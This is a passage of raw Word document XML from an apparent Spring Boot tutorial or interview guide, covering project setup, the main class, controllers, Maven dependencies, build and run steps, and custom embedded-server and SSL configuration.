        <w:t xml:space="preserve"> Maven or Gradle (Maven is commonly used)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182742A0"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nguage:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3533C439"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version:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Choose the latest stable version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFB9F38"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 Metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5917D90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oup:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., com.example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED7F12"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rtifact:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., demo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C307861"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Name:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., demo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A870CD7"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cription:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (optional, e.g., Spring Boot Demo Application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A04585D"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e name:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BED3D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ing:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jar (or WAR, depending on the requirements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD1695E"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version:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 11 or 17 (based on your environment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC436ED"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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Add the necessary dependencies based on your application (e.g., Spring Web, Spring Data JPA, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487C24F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filling in the details, click on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which will provide a zip file. Extract this zip file and open it in your preferred IDE (e.g., IntelliJ IDEA, Eclipse).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA43110"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application.properties or application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFB18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configuration properties for your Spring Boot application, such as database connection details, server port, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DEC0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pplication.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983E41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33D3622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4F69BB2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263C9A9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7E04204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7F57E457"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Main Application Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DFCAA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ry point of your Spring Boot application will be a class annotated with @SpringBootApplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496D41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F65834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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74697E9F" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E2B9F8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3A9320E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39624697" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A3ACE5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D09F3D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moApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DD111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E68FB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DemoApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3023C42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281AB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962B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BootApplication annotation is a combination of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04066D1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 Marks the class as a source of bean definitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0593538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 – Enables Spring Boot's auto-configuration mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF87C3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 – Scans for Spring components in the specified package.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC34FAE"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Controller Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D4BB7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REST endpoints, use @RestController or @Controller for serving HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4928F52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 simple REST controller:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435113E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controller;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187697F6" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B06D9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43682C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E7334F5" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C34B7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3339B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6DE26EF8" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22C813A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0A6223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307B753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0B4BB12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D791D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6029DD3"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dd Dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6D94D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add more functionality (e.g., database integration, security, etc.), you can add dependencies to pom.xml (for Maven) or build.gradle (for Gradle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF32F2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for Maven (pom.xml):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F64D67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A84714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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FA15F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629A3E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4680F84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CC2B5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4A8C96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A4457A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AE3819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4EED16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18E5011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com.h2database&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2467959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h2&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E196B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runtime&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5FEF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47E847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34AC23D8"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Build and Run the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE7D6E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your IDE:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Right-click on the DemoApplication class and choose </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2B65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the command line (using Maven):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE2EC8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spring-boot:run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E997E0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JAR file:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you’ve built your project into a JAR file (e.g., using mvn clean install), you can run it with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218534E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demo-0.0.1-SNAPSHOT.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4B51A5"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Access the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A87E49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default, the application will be running on http://localhost:8080. If you have a controller set up with a /hello endpoint, you can access it by visiting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A59FAF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hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FD4B2A"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Configure Database (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2839730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you may need to configure the DataSource, JpaRepository, or JdbcTemplate for data persistence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFDEB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E33A97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EF9E4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23B520F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76BDAD4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AUTO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AD033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962069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00A48B8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role;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43889ED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B437DAB" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1738F85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7F9B042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8FC40D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12459"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 (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EC178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e unit tests using @SpringBootTest, @WebMvcTest, or @DataJpaTest to ensure your application is working as expected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534EEAB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nit test:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159016F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53CE1E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DemoApplicationTests {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257FADB5" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E37C46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C779B5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contextLoads() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038EF0E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BBE24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BE3640D"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Create an Executable JAR or WAR (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82266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deploy the application, you can build an executable JAR or WAR file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35083BE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 build a JAR:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EEB16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3B18CE3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fter this, you will have a demo-0.0.1-SNAPSHOT.jar file in the target/ directory, which you can run as an executable JAR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AC730B"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0FC63D0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project using Spring Initializr.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431FC25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properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346FF9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BootApplication main class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B8C33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REST controllers or services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3926081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ependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0310746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and run the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294D7EE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Configure database and repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0A8A0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using unit tests).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385E608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Package the app into a JAR or WAR for deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A8D13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llowing these steps will allow you to quickly set up a Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F40A76" w14:textId="1E62571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670" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9E7E1" w14:textId="4E780834" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="650" w:name="_Toc197867864"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to configure a custom server in a Spring boot application</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="650"/>
    </w:p>
    <w:p w14:paraId="736F83BA" w14:textId="0BEF03FA" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="0075404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nfigure Server Port and Host (application.properties or application.yml)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACD396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onfigure the port and host of the embedded server in the application.properties or application.yml file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E20B95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87398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  # Specify the custom port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B6C1C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address=127.0.0.1  # Set the custom IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F33ED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ervlet.context-path=/myapp  # Define the context path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161D6AB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0194239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B25E5F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67F32E1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ress: 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773BD7A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rvlet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCDC33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xt-path: /myapp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C6033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ustomizing Server Configuration Programmatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77568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more control over the server (e.g., adding SSL, customizing connection settings), you can configure the server programmatically by implementing WebServerFactoryCustomizer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3940A183"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Customizing the Embedded Tomcat Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F80F84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embedded.tomcat.TomcatServletWebServerFactory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C1A5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ConfigurableServletWebServerFactory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D05FD7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ServletWebServerFactory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D9655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2411B3C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562A351A" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="00754045" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C440A8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95590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ServerConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72945635" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="00754045" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FBC30C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1A92AE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rvletWebServerFactory servletContainer() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E082A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ServletWebServerFactory factory = new TomcatServletWebServerFactory();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D009E6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Port(8082); // Set a custom port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCA950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ContextPath("/mycustomapp"); // Set a custom context path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C55C0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connector.setAttribute("maxThreads", 200)); // Customize thread pool size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6780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60B6F5A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FA942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9138F5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allows for more advanced server configurations like customizing the server thread pool, adding SSL support, or integrating with other server features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6FB6C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3. Configure SSL for the Server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC3E1E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nable SSL (HTTPS) by configuring it in the application.properties or application.yml file or programmatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBD830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0587AF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 Custom port for HTTPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D72EE6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  # Path to the keystore file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D311C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  # Password for the keystore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301DF7C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  # Type of keystore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B701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alias  # Alias of the key to use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC84421"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70EA909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71BA9CC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1F1DF5C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6AD1F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jks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C07036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241A18C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JKS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1835510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myalias</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50723F00"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ing an External Server (Non-Embedded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E7CB7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External Tomcat Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3E355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he default embedded Tomcat dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F91FB5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pom.xml (for Maven), add:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E64082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E9AA2C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D6487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4AC9BE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1CE6641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D9B42A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external Tomcat dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5858577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020011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apache.tomcat&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D6A42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tomcat-servlet-api&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23651D8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version&gt;9.0.41&lt;/version&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7929988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4BCD7BD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5159AD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ServletWebServerFactory Bean (optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E1DD8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ustomize your external Tomcat server by defining a ServletWebServerFactory bean, as shown in the programmatic configuration section above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFB8EE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ustomizing Other Embedded Servers (Jetty/Undertow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA71D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prefer using Jetty or Undertow instead of Tomcat, you can add their dependencies and configure them similarly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5235A74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Jetty Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6050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Jetty dependency in pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0F410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D3EFB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44B889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jetty&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C35B3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18F8229" w14:textId="77777777" w:rsidR="00754045" w:rsidRPr="002C6305" w:rsidRDefault="00754045" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19811A5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8DB4A7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eclipse.jetty&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC4F4D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jetty-server&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F304F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311B46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etty-specific configurations are similar to the ones used for Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as adjusting server port or setting SSL configurations, with a JettyServletWebServerFactory in the same way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59416F09"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Undertow Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4D93E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Undertow dependency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412FB10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lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA8190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4D55B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undertow&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583309B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90809F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ustomizing SSL for External Servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047439A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A78A3F">
          <v:rect id="_x0000_i2671" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1041463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2FFBE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DFCF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application.yml for basic configuration (e.g., port, address, context path).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1A8C7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customize the server using WebServerFactoryCustomizer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688AA84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switch to an external server like Jetty or Undertow by modifying your dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A65EA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SSL if required, either through properties or custom server configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8F4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provides flexibility in how you want your Spring Boot application to run and interact with the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD4E4C9" w14:textId="778FBE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672" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5900EC" w14:textId="38C0E07D" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="651" w:name="_Toc197867865"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to configure multiple databases in a Spring boot application</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="651"/>
    </w:p>
    <w:p w14:paraId="6E05D422" w14:textId="0E53573C" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30"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Configure Multiple Databases in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C64E50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Add Dependencies for Multiple Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B2CB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 have dependencies for both databases in your pom.xml (for Maven). If you're using two databases like MySQL and PostgreSQL, your dependencies would look like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77435EB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6E9530E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Primary Database (e.g., MySQL) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C81DE2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D34DF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079AC2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56CD823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5089CF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679BA9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16F91CE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DD6E47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808AB69" w14:textId="77777777" w:rsidR="000E5C30" w:rsidRPr="002C6305" w:rsidRDefault="000E5C30" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
